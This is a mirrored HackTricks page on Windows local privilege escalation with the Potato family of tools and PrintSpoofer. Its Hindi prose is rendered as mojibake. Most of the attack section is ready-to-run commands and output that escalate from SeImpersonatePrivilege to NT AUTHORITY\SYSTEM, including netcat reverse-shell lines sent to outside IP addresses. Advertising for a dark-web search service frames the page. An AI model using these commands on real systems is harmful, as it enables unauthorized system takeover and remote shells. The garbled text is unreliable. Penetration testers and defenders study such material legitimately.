Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

8.9 KiB
Raw Blame History

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

WhiteIntel

WhiteIntel рдПрдХ рдбрд╛рд░реНрдХ-рд╡реЗрдм рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд рд╕рд░реНрдЪ рдЗрдВрдЬрди рд╣реИ рдЬреЛ рдореБрдлреНрдд рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛рдПрдБ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ рддрд╛рдХрд┐ рдпрд╣ рдЬрд╛рдВрдЪрд╛ рдЬрд╛ рд╕рдХреЗ рдХрд┐ рдХреНрдпрд╛ рдХреЛрдИ рдХрдВрдкрдиреА рдпрд╛ рдЙрд╕рдХреЗ рдЧреНрд░рд╛рд╣рдХ рд╕рдордЭреМрддрд╛ рдХрд┐рдП рдЧрдП рд╣реИрдВ рдЪреЛрд░реА рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдорд╛рд▓рд╡реЗрдпрд░ рджреНрд╡рд╛рд░рд╛ред

WhiteIntel рдХрд╛ рдкреНрд░рд╛рдердорд┐рдХ рд▓рдХреНрд╖реНрдп рдЬрд╛рдирдХрд╛рд░реА-рдЪреЛрд░реА рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдорд╛рд▓рд╡реЗрдпрд░ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рдЦрд╛рддрд╛ рдЕрдзрд┐рдЧреНрд░рд╣рдг рдФрд░ рд░реИрдирд╕рдорд╡реЗрдпрд░ рд╣рдорд▓реЛрдВ рд╕реЗ рд▓рдбрд╝рдирд╛ рд╣реИред

рдЖрдк рдЙрдирдХреА рд╡реЗрдмрд╕рд╛рдЗрдЯ рдкрд░ рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЙрдирдХреЗ рдЗрдВрдЬрди рдХреЛ рдореБрдлреНрдд рдореЗрдВ рдЖрдЬрдорд╛ рд╕рдХрддреЗ рд╣реИрдВ:

{% embed url="https://whiteintel.io" %}

{% hint style="warning" %} JuicyPotato Windows Server 2019 рдФрд░ Windows 10 рдмрд┐рд▓реНрдб 1809 рд╕реЗ рдЖрдЧреЗ рдХрд╛рдо рдирд╣реАрдВ рдХрд░рддрд╛ред рд╣рд╛рд▓рд╛рдБрдХрд┐, PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato, EfsPotato, DCOMPotato** рдХрд╛ рдЙрдкрдпреЛрдЧ рд╕рдорд╛рди рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рдиреЗ рдФрд░ NT AUTHORITY\SYSTEM рд╕реНрддрд░ рдХреА рдкрд╣реБрдВрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдпрд╣ рдмреНрд▓реЙрдЧ рдкреЛрд╕реНрдЯ PrintSpoofer рдЯреВрд▓ рдкрд░ рдЧрд╣рд░рд╛рдИ рд╕реЗ рдЬрд╛рддреА рд╣реИ, рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ Windows 10 рдФрд░ Server 2019 рд╣реЛрд╕реНрдЯ рдкрд░ рдЕрдиреБрдХрд░рдг рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ рдЬрд╣рд╛рдБ JuicyPotato рдЕрдм рдХрд╛рдо рдирд╣реАрдВ рдХрд░рддрд╛ред {% endhint %}

Quick Demo

PrintSpoofer

c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

RoguePotato

{% code overflow="wrap" %}

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

{% endcode %}

SharpEfsPotato

> SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

EfsPotato

> EfsPotato.exe "whoami"
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]

[+] Current user: NT Service\MSSQLSERVER
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=aeee30)
[+] Get Token: 888
[!] process with pid: 3696 created.
==============================
[x] EfsRpcEncryptFileSrv failed: 1818

nt authority\system

GodPotato

> GodPotato -cmd "cmd /c whoami"
# You can achieve a reverse shell like this.
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

DCOMPotato

image

References

WhiteIntel

WhiteIntel рдПрдХ рдбрд╛рд░реНрдХ-рд╡реЗрдм рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд рд╕рд░реНрдЪ рдЗрдВрдЬрди рд╣реИ рдЬреЛ рдлреНрд░реА рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛рдПрдБ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ рддрд╛рдХрд┐ рдпрд╣ рдЬрд╛рдВрдЪрд╛ рдЬрд╛ рд╕рдХреЗ рдХрд┐ рдХреНрдпрд╛ рдХреЛрдИ рдХрдВрдкрдиреА рдпрд╛ рдЙрд╕рдХреЗ рдЧреНрд░рд╛рд╣рдХ рд╕рдВрдкрд░реНрдХрд┐рдд рд╣реБрдП рд╣реИрдВ рдЪреЛрд░реА рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдорд╛рд▓рд╡реЗрдпрд░ рджреНрд╡рд╛рд░рд╛ред

WhiteIntel рдХрд╛ рдкреНрд░рд╛рдердорд┐рдХ рд▓рдХреНрд╖реНрдп рдЬрд╛рдирдХрд╛рд░реА-рдЪреЛрд░реА рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдорд╛рд▓рд╡реЗрдпрд░ рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк рдЦрд╛рддрд╛ рдЕрдзрд┐рдЧреНрд░рд╣рдг рдФрд░ рд░реИрдирд╕рдорд╡реЗрдпрд░ рд╣рдорд▓реЛрдВ рд╕реЗ рд▓рдбрд╝рдирд╛ рд╣реИред

рдЖрдк рдЙрдирдХреА рд╡реЗрдмрд╕рд╛рдЗрдЯ рдкрд░ рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдлреНрд░реА рдореЗрдВ рдЙрдирдХреЗ рдЗрдВрдЬрди рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:

{% embed url="https://whiteintel.io" %}

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}